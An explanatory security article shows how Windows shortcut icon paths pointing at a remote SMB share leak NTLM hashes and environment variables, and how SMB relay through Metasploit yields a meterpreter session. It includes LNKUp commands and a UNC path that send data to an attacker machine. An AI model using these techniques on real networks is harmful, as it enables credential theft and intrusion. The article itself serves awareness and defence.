Windows shortcuts: where do they lead and can they be dangerous?

In this article we will talk about methods of compromising systems using standard Windows OS functionality available when creating shortcuts and how to deal with it.

How does it work and should I be afraid

Perhaps, the majority of Windows users know that launching suspicious programs and clicks on unknown shortcuts is not safe, and even the “worst” users try not to do so. So, we will not talk about it.

And also, most users at least once tried to change the shortcut icon.

Let me remind you that this is done through the properties, something like this:
')


And what values ​​can be specified in this field?



Does the path have to be local? Not really. Those. can you point something here



And when the user navigates to the directory containing such a shortcut, the following will occur.
Screenshot from Wireshark on machine 192.168.1.3.



Server 192.168.1.3 was unable to accept a TCP connection because it does not listen on TCP port 445, i.e. SMB. At first glance it may seem that there is nothing to worry about, but it is not.

Server 192.168.1.3 can end a TCP handshake and behave like an SMB server. For example, using the Metasploit framework module .



Let's try to go to the directory with the label again and then check the Metasploit console



We got the NTLM hash of the user who "saw" our label.

This vulnerability (feature) has been known for over 20 years, since the days of WinNT / Win95 and exists to this day. Microsoft proposes fighting this vulnerability with NTLM Blocking . But the user must configure it himself.



And get acquainted with all the "but"



Some providers can block outgoing traffic to the Internet on port 445, which, too, can protect users who do not have the appropriate policies on their machines, but will not protect them from attacks on the local network.

LNKUp - operation automation

More recently, the LNKUp tool has been released, allowing you to automate the process of creating lnk files, similar to the one we discussed above. You can download it on the official GitHub .

The utility is written in Python, runs under Windows and requires Python-packages pylnk and pypiwin32.



To create a shortcut for capturing an NTLM hash, use the following command.

python generate.py --host HOST --type ntlm --output out.lnk 

where HOST is the machine running the Metasploit SMB server.

The second use case of LNKUp is getting user environment variables. This works because you can use environment variables in the properties of the shortcut, like this:



To read them you need to run the sniffer on the machine 192.168.1.3

The command to create a shortcut looks like this:

 python generate.py --host 192.168.1.3 --output out.lnk --type environment --vars PROCESSOR_ARCHITECTURE 

And in the traffic dump we will see



Those. The path to the icon in the properties of the shortcut looked like this

 \\192.168.1.3\SHARE_%PROCESSOR_ARCHITECTURE% 

Thus, the user does not need to specifically launch something, he just needs to go to the directory where the malicious shortcut is located, for example, the network directory or “see” it when connecting external media.

SMB Relay when browsing a directory

With the Metasploit framework, you can raise another kind of SMB server using the exploit / windows / smb / smb_relay module and launch an SMB Relay type attack.



Now suppose that the malicious shortcut was placed in a network directory that administrators typically use to install software. At the next opening of such a directory, NTLM administrator authentication will be redirected to our selected machine on the network.



And there will be a session of meterpreter





Based on all of the above, it may be concluded that NTLM authentication should be abandoned wherever possible, and also to pay increased attention to network security and access to shared resources on which an attacker can place malicious objects.